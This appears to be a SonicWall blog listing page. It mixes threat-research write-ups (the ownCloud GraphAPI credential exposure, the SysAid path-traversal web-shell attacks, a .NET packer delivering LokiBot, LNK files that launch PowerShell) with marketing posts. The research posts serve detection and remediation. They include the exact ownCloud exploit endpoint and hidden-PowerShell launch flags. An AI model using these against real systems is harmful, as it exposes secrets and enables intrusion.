ownCloud GraphAPI Sensitive Data Exposure

/in /by

Overview

This week, the SonicWall Capture Labs Threat Research Team became aware of a disclosure of sensitive information vulnerability in ownCloud’s GraphAPI application, assessed its impact and developed mitigation measures for the vulnerability. ownCloud, an open-source software for sharing and syncing of files in distributed environments, published an advisory on this sensitive credentials and configuration disclosure vulnerability affecting ownCloud graphapi application versions 0.2.x before 0.2.1 and 0.3.x before 0.3.1.

It can be exploited effortlessly by an unauthenticated remote attacker and carries significant associated critical risk. The vulnerability was also given the highest CVSS score of 10.0. Because of all this, it’s not only capturing the imagination of the cybersecurity community, but it’s also reportedly being exploited in the wild rapidly, making it a strong candidate to join CISA’s Known Exploited Vulnerabilities (KEV) catalog. Hence, it is advisable for ownCloud users to take the mitigation steps provided in the remediation recommendations section.

Update 12/3/23

Due to this vulnerability’s severity and easy of exploitation, it is catching attention of cybersecurity community all around the world resulting in many exploring a way to exploit the containerized deployment, previous reported as unexploitable. Researchers at Rapid7 recently reported a technique to overcome the hardening offered by the mod_rewrite segment of the .htaccess file, making the docker mode of installation as vulnerable as the manual one removing any speculation around the severity of this CVE due to limited exploitation possibilities.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-49103.

The overall CVSS score is 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

The vulnerable version of the graphapi application, which comes installed by default if you choose manual or docker-based way of installation, contains the endpoint /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. That endpoint reveals the critical configuration details as a part of the output of the phpinfo function when accessed by the unauthenticated remote attacker as seen in Figure 1.

Figure 1: Vulnerable endpoint in graphapi

However, the ownCloud docker does not expose the vulnerable endpoint by default due to the additional mod_rewrite block present in the .htaccess file, as illustrated in Figure 2, which triggers a redirection to the login page when someone navigates to the endpoint. On the other hand, by default, the manual installation allows access to the endpoint making the docker mode of installation relatively safer. It’s noteworthy to mention that enabling graphapi is not a prerequisite for the exploit to work.

Figure 2: Additional mod_rewrite block in docker installation

Triggering the vulnerability

Triggering this vulnerability is a breeze, as it only requires hitting the vulnerable endpoint, such as http(s)://example-owncloud[.]com/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. The attacker only needs to have network access to the vulnerable software.

Exploitation

As demonstrated in Figure 3, successful exploitation of this vulnerability yields the attackers a bunch of juicy information that is stored in the environment variable. This includes the configuration variables of the webserver and may also contain critical information such as mail server credentials, license keys, AWS secrets and other confidential data in case of containerized deployment with vulnerable configuration.

Figure 3: Sample successful exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:
  • IPS:4186 ownCloud GraphAPI Sensitive Data Exposure

Threat Graph

SonicWall sensors have confirmed the spike in the exploitation attempts of this vulnerability and may witness even a surge in upcoming days considering the simplicity of exploitation.

Figure 4: SonicWall signature hits data (Updated 12/3/23)

Remediation Recommendations

ownCloud has released an update to address the issue, and it is strongly recommended to update the graphapi application to the latest version 0.3.1.

Those who are not able to update immediately can also apply the workaround by deleting the root cause file /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php and plan for the update as early as possible.

Relevant Links

What the 2023 MITRE ATT&CK Evaluation Results Mean for SonicWall Users

/0 Comments/in , /by

Note: Previously, we explained the MITRE ATT&CK framework and how security products are evaluated for detection efficacy and efficiency. Check out these blogs (Part 1 and Part 2) if you haven’t already.

The 2023 MITRE ATT&CK® Evaluations focused on the adversary Turla, a Russia-based threat group active since at least the early 2000s. Turla is known for deploying sophisticated proprietary tools and malware. It has targeted victims in over 45 countries, spanning a range of critical industries and infrastructure such as government agencies, diplomatic missions, military groups, research and education facilities, and media organizations.

But while Turla is unquestionably a formidable adversary, it proved no match for the SentinelOne-powered SonicWall Capture Client, as we’ll explore below.

Understanding MITRE ATT&CK and SonicWall Capture Client

Before we dive in, however, a bit of background on the MITRE ATT&CK evaluations and SonicWall Capture Client is likely to be helpful:

MITRE ATT&CK Evaluations: ATT&CK stands for “Adversarial Tactics, Techniques & Common Knowledge.” It’s designed to be a common language, the components of which are used in endless combinations to describe how threat actors operate. The MITRE Engenuity ATT&CK Evaluations are based on the MITRE ATT&CK knowledge base, a globally accessible repository of threat actor behaviors and techniques observed in real-world cyberattacks. The evaluations provide transparency and insight into how well different cybersecurity solutions can detect and prevent these tactics, as well as how they present relevant information to end users.

SonicWall Capture Client Endpoint Security: SonicWall Capture Client is a cutting-edge endpoint security solution powered by the SentinelOne Singularity platform. It leverages multiple layers of security – including real-time behavior monitoring, anti-ransomware technology and malware prevention – to automatically detect and prevent malicious activity in real time, without relying on signatures, rules or human intervention.

To reduce alert fatigue, Capture Client automatically stitches together related alerts, providing analysts with a full view of detections across all covered attack vectors correlated into several incidents.

Capture Client’s built-in, autonomous EDR provides automation and orchestration capabilities for rapid response and remediation actions. What’s more, Capture Client’s synergy with the rest of the SonicWall platform allows for increased visibility and protection both on and off the network.

The 2023 MITRE ATT&CK Evaluations

The 2023 MITRE ATT&CK Evaluations emulated Turla to test 30 cybersecurity vendors on their ability to detect and respond to an advanced real-world threat. Evaluation results are available on the official website, where you can view and compare the test data of each vendor across 143 sub-steps that represent the attack sequence of Turla. You can also filter the results by different criteria, such as detection type, telemetry type, platform or technique.

The test data consists of three main categories:

  • Visibility: Evaluates whether the vendor was able to detect a specific sub-step of the attack sequence and what type of telemetry (e.g., process, file, registry, network) was used to provide that detection. The higher the visibility score, the more sub-steps were detected by the vendor.
  • Analytic Quality: Evaluates the quality of the detection analytics (e.g., rules, signatures, models) used to identify a specific sub-step of the attack sequence. The analytic quality score ranges from 1 (lowest) to 5 (highest) based on criteria such as specificity, relevance, timeliness, accuracy and completeness. The higher the analytic quality score, the better the detection analytics were at capturing the adversary’s behavior.
  • Configuration Change: Evaluates whether the vendor required any configuration changes (e.g., enabling or disabling features, modifying settings) to achieve a specific detection. The configuration change score ranges from 0 (no change) to 2 (major change) based on criteria such as complexity, impact and documentation. The lower the configuration change score, the fewer changes were needed by the vendor.

SentinelOne: Once Again at the Front of the Pack

SonicWall customers trust our SentinelOne-powered Capture Client to protect them from the most advanced threats. In this year’s Evaluations, the exact agent, platform and features used to safeguard SonicWall users every day detected and blocked every phase of the Turla attack with zero delays and no unrealistic reconfigurations or bolt-on features.

It outperformed all other vendors in terms of detection and prevention capabilities, as well as analytic quality and configuration changes.

Figure 1 shows exactly what Capture Client (SentinelOne) achieved:

Figure 1: SentinelOne MITRE ATT&CK Evaluation results

These results highlight how the SentinelOne Singularity platform maps directly to the MITRE ATT&CK framework to deliver unparalleled detection and prevention of advanced threat actor tactics, techniques and procedures (TTPs). SentinelOne Singularity XDR also provides real-world information to defenders without any configuration changes4 – because there are no re-tests in the real world.

Figure 2: A closer look at SentinelOne evaluation results.

By choosing Capture Client (SentinelOne) for your organization, your organization can benefit from:

  • Autonomous Protection: Automatically detect and prevent malicious activity in real time across all attack surfaces.
  • High-Quality Analytics: Leverage high-quality analytics of threat behavior with specificity, relevance, timeliness, accuracy and completeness.
  • Zero Configuration Changes: Enjoy optimal performance without any configuration changes, reducing complexity and overhead
  • Real-Time Visibility: Gain comprehensive visibility into the attack sequence and timeline, as well as threat intelligence, indicators of compromise (IOCs), root cause analysis and remediation steps.
  • Automation and Orchestration: Automate and orchestrate response and remediation actions with protection that integrates with other security tools and platforms.

Figure 3: Capture Client provides real-time visibility with Attack Storyline, which displays an attack in its entirety and combines alerts and individual events into a single, comprehensive view.

Conclusion

The MITRE ATT&CK Evaluation provides transparent and objective data, which allows vendors and users the ability to compare different cybersecurity solutions based on their ability to detect and prevent real-world threats. For those looking to purchase a reliable and effective cybersecurity solution, these results can help determine which one best suits their needs and goals.

For four consecutive years, SonicWall Capture Client has proven its industry-leading detection and protection capabilities in the MITRE ATT&CK Enterprise Evaluations. You can request a demo or a free trial of Capture Client, or compare SonicWall Capture Client (SentinelOne) with other vendors on MITRE Engenuity’s website.

SonicWall’s Elizabeth Reynolds Honored by CRN Again

/0 Comments/in /by

SonicWall is proud to announce that Elizabeth Reynolds has been recognized in the CRN 2023 Women on the Rise list. This annual list, formerly known as CRN Rising Female Stars, honors up-and-coming, dedicated, driven women who are leaving their mark and making a difference for solution providers throughout the IT channel.

The fourth-annual list of channel Women on the Rise showcases an impressive lineup of nominees, meticulously chosen by the CRN editorial team. This selection process heavily relied on recommendations from esteemed channel chiefs and other channel management executives within the industry.

The honorees are exceptional women dedicated to supporting their channel partners in achieving success. They exhibit remarkable skills in various areas such as marketing, channel program management, and partner engagement, among others. Through their expertise, they effectively enhance their respective channel partner programs and initiatives.

“The CRN 2023 Channel Women on the Rise list showcases the women who are on the verge of becoming the future leaders and luminaries in the channel industry. These remarkable individuals consistently exhibit a strong commitment to innovation and excellence within the IT channel. Their collective efforts are instrumental in shaping a more promising future for the IT industry,” said Jennifer Follett, vice president of U.S. Content and Executive Editor of CRN at The Channel Company. “I would like to extend my congratulations to all the honorees on behalf of The Channel Company and CRN. The efforts of these emerging leaders in driving change within the IT channel will undoubtedly shape its future for years to come.”

Elizabeth is SonicWall’s Regional Sales Director of Channel Sales. Since she joined SonicWall in 2017, her expertise in operations management, analytics and communication has empowered her to make significant contributions. Elizabeth has an incredibly strong sales background and business acumen, which has helped SonicWall transform its sales organization.

“CRN recognizing Elizabeth is another indication of SonicWall’s continued commitment to our partner network and validates the talent within our organization,” said SonicWall Chief Revenue Officer Jason Carter. “Elizabeth is an incredible colleague — she’s respected by all, easy to work with and an asset to the entire SonicWall team. We’re pleased and proud that CRN has chosen to include her on its annual list of Women on the Rise”

The Unseen Layers: Exploring the Tactics of Multistage .NET Malware Packers

/in /by

OVERVIEW

Recently, the SonicWall Capture Labs Threat Research team has identified a new .NET Packer that is currently being widely used by the various stealers such as Lokibot, AgentTesla etc. In the ever-evolving landscape of cybersecurity threats, malicious actors continue to develop sophisticated techniques to compromise systems and exploit vulnerabilities. One such method gaining prominence is the use of multistage .NET malware packers. These devious tools leverage the capabilities of the .NET framework to execute nefarious activities, posing a significant challenge to the cybersecurity of endpoints.
Packers employ the dynamic loading features of .NET, allowing them to download and execute additional modules or payloads off the land without ever touching the secondary storage such as Hard Disks.

To avoid detection, Packer employs evasion techniques such as polymorphic code, obfuscation and encryption. These methods make it difficult for security tools to analyze the malicious code, as it constantly changes its appearance or remains concealed within layers of encryption.

INFECTION CYCLE

Currently, Packer is mainly delivered though phishing emails with a .ZIP file as an attachment. The ZIP attachment contains the PE Packer file.

Figure 1: Infection Chain

TECHNICAL OVERVIEW

Layer 1 of Packer consists of an encrypted layer and the final payload as resource objects. Its execution begins by decrypting the next layer, which is encrypted as a resource of the Packer file named “QuanLyKhSan.GUI.ucDichVu.FR”.

Figure 2: Resource objects stored in layer 1

Figure 3: Decryption code logic for layer 2

Layer 2, which is a DLL file, consists of six exported functions.

Figure 4: Layer 2 classes along with function names

It decrypts the resource “GloriousCore.Properties.Resources.resources.HgoHWhJ”, which is an encrypted fifth layer. Meanwhile, decrypting it causes it to sleep for 15 seconds to evade detection from emulators.

UNVEILING THE FINAL PAYLOAD

1.) Loading of Ⴈ.dll

  • a. Ⴈ.dll is hardcoded in layer 2 as an encrypted byte array.
  • b. The byte array is first transformed using a simple XOR operation.

    Figure 5: XOR operation

  • c. The transformed array is then decompressed using the deflate algorithm and loaded into memory.
  • d. “Ⴈ.dll” has an encrypted resource named "Xeros.Vu.resources. Ⴐ"

2.) Decryption of resource “Xeros.Vu.resources. Ⴐ”

  • a. Layer 2 uses GZipStream to decompress the resource object “Ⴐ”.
  • b. It decrypts the decompressed buffer using an XOR loop.
  • c. The decrypted bytes are a DLL module called “ReactionDiffusion.dll”

    Figure 6: Functions names and XOR keys are stored in an encoded array.

3.) An instance of the ReactionDiffusion.dll module is created.

  • a. ReactionDiffusion.dll decrypts the method name “CausalitySource”.

    Figure 7: Invoking the function “CausalitySource”

  • b. The resource “HgoHWhJ” is a PNG file.

  • c. Packer uses steganography to hide the encrypted layer 5. It executes the function “RestoreOriginalBitmap” to convert the bitmap PNG file into an encrypted byte array.

    Figure 8: Bitmap decoding function from ReactionDiffusion.dll

  • d. An encrypted byte array is decrypted using an XOR loop with three byte keys.

    Figure 9: Decryption function for layer 5

  • e. Final output is the “Tyrone.dll” module.
    4.) Tyrone.dll has an embedded encrypted final payload. In this case, it’s LokiBot.

    Figure 10: Final payload embedded as resource

  • a. Encrypted resource “bcBuFuHG” is decrypted using a simple XOR.

Figure 11: Loading of resource using Resource Manager

Figure 12: Decryption code of the final payload

Lastly, the final payload is injected into a newly created self-process using process hollowing. The final payload in this analyzed Packer is identified as LokiBot, for which we have already written a blog post.

Evidence of the detection by SonicWall’s patented RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 13: RTDMI ATP result report conclusion

As .NET malware packers continue to evolve, so must our cybersecurity strategies. Staying informed about the latest threat vectors, adopting advanced security solutions and fostering a proactive cybersecurity posture are essential steps in mitigating the risks posed by these insidious threats. By understanding the intricacies of .NET malware packers, organizations can better protect their systems and data from the ever-present challenges of the digital landscape.

IOCs:

ZIP

  • 070b7112e24ec3a1f2d7cfab98cee1e7f3940a33b199e4ae04b367f9dd20d451

Packer

  • 301e3dd329bd0c0aa4f40a68100350867bd5c956a13f238eedbf68d58c13f2e9
  • 26c034022d9d6924477e3e79cc95590f394e3ccf2ad743163c5a80baacf2a66f
  • 4c9c03f472adf45cc9f246fdf83b28fd1e197bc2ad831dfb75371bb14d5b5585

Lokibot

  • d51297e331fce1ba9f707991445e746a5bce48b1892dfc79d107dcbff9a0b2cf

AgentTesla

  • a02e8a878b70f214f0b9cff49a7d1f594114b80dd1935f9f9e4ea19fb978ba54

SysAid Path Traversal Vulnerability

/in /by

Overview

SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, disclosed CVE-2023-47426, which is a zero-day path traversal vulnerability carrying a CVSS 9.8 score and affecting on-premise SysAid servers running version < 23.3.36. According to Microsoft’s threat intelligence team and SysAid’s Advisory, it has been exploited in the wild by Lace Tempest (DEV-0950 / TA-505). SonicWall is also currently seeing an increasing number of active exploitation attempts. This is the same threat actor responsible for exploiting the MoveIT File Transfer Tool vulnerability, and the threat actor is associated with a ransomware group known as "CL0P". To mitigate this vulnerability, SysAid has released a patch which is present in version 23.3.36.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-47246.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This path traversal vulnerability allows for threat actors to upload a malicious WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service through a POST request. The attacker can then request the web shell by browsing to the URL where it now resides to gain access to the server.

Triggering the Vulnerability

The vulnerability exists within the SysAid com.ilient.server.UserEntry class in the doPost method. The accountID parameter within this request is suspectable to the path injection since it is directly passed to the File function. By decompiling the Java code, it is possible to see the accountID parameter being saved into a string variable named convertParamater as shown in Figure 1.

Figure 1: doPost Method parsing accoutnId

convertParameter is then stored in a variable which is passed to the file constructor as shown in Figure 2. For readability, the variable has been renamed accountIDParameter.

Figure 2: accountID being used to create a file

The path dictated in the accountID parameter is the location where the data in the body of the POST request will be written. Therefore, to trigger and leverage this vulnerability the attacker needs to send a POST request to the server with the accountID parameter set to where the data in the body of the post request should be written.

Exploitation

Threat actors have been seen successfully exploiting this vulnerability by uploading a WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service. This is accomplished by sending a POST request with a zlib compressed WAR file containing the web shell as the request body and the accountID parameter are injected with the webroot directory. The threat actor then executes this web shell and gains access to the system by navigating to the location injected into the accountID parameter.

Post-Exploitation

After gaining a web shell through the SysAid vulnerability, threat actors were seen leveraging two PowerShell scripts to carry out post exploitation activities. The first is used to launch a malware loader named user.exe. This loads the GraceWire trojan and injects it into Windows processes such as spoolsv.ese. Following the first GraceWire trojan deployment, a second PowerShell script is used to erase evidence associated with the attacker’s actions including cleaning the SysAid on-prem server web logs. Figure 3 below shows the complete attack chain as presented by Zscaler.

Figure 3: Zscaler’s suspected exploit chain

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • Attempted Exploitation – IPS:4172 SysAid On-Prem Software Directory Traversal
  • Known Post Exploitation – SPY: 500 Malformed-ps1 ps1.OT_1
  • Known Post Exploitation – SPY: 501 Malformed-ps1 ps1.OT_2

Threat Graph

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graph in Figure 4 indicates an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 4: SonicWall IPS 4172 Threat Graph

Remediation Recommendations

SysAid has released an update to patch the vulnerability, and it is strongly recommended to update to version 23.3.36 if running a SysAid On-Prem server. The SysAid advisory has also published relevant IOCs and recommendations to identify any system compromise.

Relevant Links

Malicious LNK Files Use PowerShell to Deliver Payload

/in /by

Overview

This week, the Sonicwall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits – UNIQLO 2023.lnk
  • Requirements and responsibilities – UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file will run an instance of powershell.exe in the background. PowerShell is built in to Windows and is used as a scripting language that is mostly used to automate admin tasks.

The script is base64 encoded, and when decoded, it shows that its main purpose is to download additional files from a remote server.

Figure 1: Command line

The execution of this script is done without the knowledge of the user and utilizes the following options when running PowerShell.

p o w e r s h e l l . e x e - N o L o g o - N o P r o f i l e - W i n d o w S t y l e h i d d e n - E x e c u t i o n P o l i c y b y p a s s - E n c o d e d C o m m a n d

Meanwhile, an image file is launched and shows a picture of a product. In the screenshot below, an image of what seems like a Reebok-branded outfit is shown when executing the malicious LNK file named “New product Reebok 2023.lnk”.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: Powershell.exe connecting to a remote host to download a file which was saved into %temp% directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: SvczHost.exe connecting to a remote host and downloading an additional component file that was later written into %temp% directory as myRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt was created which looks like the connection log file. Interestingly the log file, contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing amount of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can contain malicious code to abuse legitimate windows system tools, which is a simple way for criminals to evade detection.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Suspicious#powershell.steal (Trojan)
• GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

SonicWall Empowers Partners with MDR and SOCaaS

/0 Comments/in , /by

The cybersecurity landscape has never been more complex. As threats grow in number and sophistication, budgets and headcount can’t keep up. In response, many IT teams have turned to managed services for their cybersecurity needs — so much so that by the end of 2023, an estimated 41% of SMB cybersecurity spend will be allocated to managed service and system integrators, up from 35% in 2020.

But these MSPs (Managed Service Providers) and MSSPs (Managed Security Service Providers) are often facing the same challenges as their clients: they lack a team of dedicated threat analysts and researchers to help manage and respond to the never-ending stream of security alerts from disparate point solutions.

To effectively bridge these gaps, SonicWall’s global network of MSPs, MSSPs and other channel partners must move from a network of unmanaged point products to a seamless platform of managed security solutions. That’s why we’re pleased to announce we’ve acquired Solutions Granted, Inc., a top MSSP based in the United States — a move that will add several key technologies to the SonicWall portfolio, including Managed Detection and Response (MDR), Security Operations Center as a Service (SOCaaS) and other managed services.

Meet Solutions Granted

Since its inception, Solutions Granted has worked with SonicWall to deliver best-in-class cybersecurity to MSPs. The company has spent the past 18 years focusing on its open ecosystem, solving alert fatigue and empowering MSPs to better secure small- and medium-sized businesses (SMBs).

Solutions Granted currently delivers world-class managed security services to MSPs throughout North America, including thousands of channel partners serving SMBs. Based on the strength of its services and support, the company has emerged as a clear leader in the security space, winning countless awards including the CRN Security 100 list (2018-2021), Top Global MSSP List (2018-2021), and Blackberry Cylance MSSP Partner of the Year (2018, 2019, 2021).

We are excited to welcome the expertise of the Solutions Granted team, particularly their CEO Michael Crean. Crean will assume a critical leadership role, advising on the ongoing process of seamlessly integrating Solutions Granted services with our products and partner offerings.

Crean is a 20-year veteran of the channel who has built a career characterized by a passion for enabling the MSP community on practical approaches to cybersecurity.

His vision of bridging the gap between information technology and security — and his commitment to providing solutions tailored to customers’ business goals, ecosystem and compliance standards — pushed Solutions Granted to quick and enduring success.

New Solutions and Services

Solutions Granted will augment partners’ managed service portfolio by extending new core offerings:

MDR for Endpoint: Comprehensive service that includes 24×7 threat monitoring, threat hunting and detection/response to all types of threats from many different points of entry

MDR for Cloud: 24×7 protection from advanced phishing and SaaS threats that make it past Microsoft 365 and Google Workspace’s defenses

SOCaaS (Managed SIEM): Centralized log management service unifying disparate security alerts and logs, designed to aid with threat investigations and compliance

Vulnerability Management: Network discovery and vulnerability management solution that identifies and prioritizes risk to your attack surface.

These services represent natural add-ons for MSPs looking to better meet customers’ evolving security and regulatory requirements. Solutions Granted services are already integrated into existing SonicWall offerings, such as firewalls and SMA (Secure Mobile Access) series, and there are other exciting developments on the horizon — including an MDR solution leveraging SonicWall Capture Client.

Benefits to You, Our Partners, MSPs and End Users

The initial acquisition of Solutions Granted was driven by an increase in partner requests for these services — and our partners will remain at the heart of SonicWall’s strategic plans going forward. Solutions Granted’s customers are many of the partners we do business with today, and this move will help them expand their business, deliver a more complete service offering, and provide advanced tools and talent as a service.

In addition to nearly half a century of combined cybersecurity expertise, SonicWall and Solutions Granted partners will benefit from a streamlined approach for managing security across customer environments, all through the same MSP-friendly unified console they’re accustomed to. And by bringing SonicWall and Solutions Granted technologies together, partners will enjoy an even greater ease of doing business.

Forging Toward the Future Together

Over time, SonicWall and Solutions Granted offerings will become as synonymous and seamless as the products contained within their portfolio. And this portfolio will continue to grow as we harness the power of superior threat intelligence to develop a unified cybersecurity platform meeting the evolving needs of service providers.

To bring this vision to life, SonicWall will leverage internal development, acquisitions and strategic partnerships to constantly innovate and deliver cutting-edge defense capabilities to keep pace with the ever-changing threat landscape.

But above all, this represents a continuation of SonicWall’s renewed commitment to its partners — one that started over a year ago with the adoption of our “outside-in” strategy and has continued with the launch of our SecureFirst Partner Program. As this journey continues, we will empower our valued partner community with cost-effective threat defense services, industry expertise and innovative technology.

Learn more about becoming a partner, or register for our live webinar hosted by Bob VanKirk and Michael Crean to get more details on this important milestone.

 

Microsoft Security Bulletin Coverage for November 2023

/in /by

Overview

Microsoft’s November 2023 Patch Tuesday has 57 vulnerabilities, and 15 of them are remote code execution vulnerabilities. The vulnerabilities can be classified into the following categories:

  • 17 Elevation of Privilege Vulnerabilities
  • 5 Security Feature Bypass Vulnerabilities
  • 15 Remote Code Execution Vulnerabilities
  • 6 Information Disclosure Vulnerabilities
  • 5 Denial of Service Vulnerabilities
  • 9 Spoofing Vulnerability

Figure 1: A pie chart breaking down the vulnerabilities by category.

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023 and has produced coverage for six of the reported vulnerabilities.

Vulnerabilities with Detections

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
ASPY 505 Exploit-exe exe.MP_351
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
ASPY 506 Exploit-exe exe.MP_352
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
ASPY 504 Exploit-exe exe.MP_350
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
ASPY 503 Exploit-exe exe.MP_349
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
ASPY 507 Malformed-docx docx.MP_10
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 502 Exploit-exe exe.MP_348

Remote Code Execution Vulnerabilities

CVE-2023-36017   Windows Scripting Engine Memory Corruption Vulnerability
CVE-2023-36028   Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
CVE-2023-36041   Microsoft Excel Remote Code Execution Vulnerability
CVE-2023-36045   Microsoft Office Graphics Remote Code Execution Vulnerability
CVE-2023-36393   Windows User Interface Application Core Remote Code Execution Vulnerability
CVE-2023-36396   Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2023-36397   Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
CVE-2023-36401   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36402   Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2023-36423   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36425   Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2023-36437   Azure DevOps Server Remote Code Execution Vulnerability
CVE-2023-36439   Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2023-38151   Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability
CVE-2023-38177   Microsoft SharePoint Server Remote Code Execution Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2023-36047   Windows Authentication Elevation of Privilege Vulnerability
CVE-2023-36049   .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
CVE-2023-36400   Windows HMAC Key Derivation Elevation of Privilege Vulnerability
CVE-2023-36403   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36405   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36407   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36408   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36422   Microsoft Windows Defender Elevation of Privilege Vulnerability
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2023-36427   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36558   ASP.NET Core – Security Feature Bypass Vulnerability
CVE-2023-36705   Windows Installer Elevation of Privilege Vulnerability
CVE-2023-36719   Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

Denial of Service Vulnerabilities

CVE-2023-36038   ASP.NET Core Denial of Service Vulnerability
CVE-2023-36042   Visual Studio Denial of Service Vulnerability
CVE-2023-36046   Windows Authentication Denial of Service Vulnerability
CVE-2023-36392   DHCP Server Service Denial of Service Vulnerability
CVE-2023-36395   Windows Deployment Services Denial of Service Vulnerability
Information Disclosure Vulnerabilities
CVE-2023-36043   Open Management Infrastructure Information Disclosure Vulnerability
CVE-2023-36052   Azure CLI REST Command Information Disclosure Vulnerability
CVE-2023-36398   Windows NTFS Information Disclosure Vulnerability
CVE-2023-36404   Windows Kernel Information Disclosure Vulnerability
CVE-2023-36406   Windows Hyper-V Information Disclosure Vulnerability
CVE-2023-36428   Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2023-36021   Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability
CVE-2023-36025   Windows SmartScreen Security Feature Bypass Vulnerability
CVE-2023-36037   Microsoft Excel Security Feature Bypass Vulnerability
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
CVE-2023-36560   ASP.NET Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2023-36007   Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability
CVE-2023-36016   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36018   Visual Studio Code Jupyter Extension Spoofing Vulnerability
CVE-2023-36030   Microsoft Dynamics 365 Sales Spoofing Vulnerability
CVE-2023-36031   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36035   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36039   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36050   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36410   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

AgentTesla Updates Its Infection Chain

/in /by

The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with AgentTesla stealer and other bots having a wide variety of capabilities.
Infection_Chain

Figure 1: Infection Chain

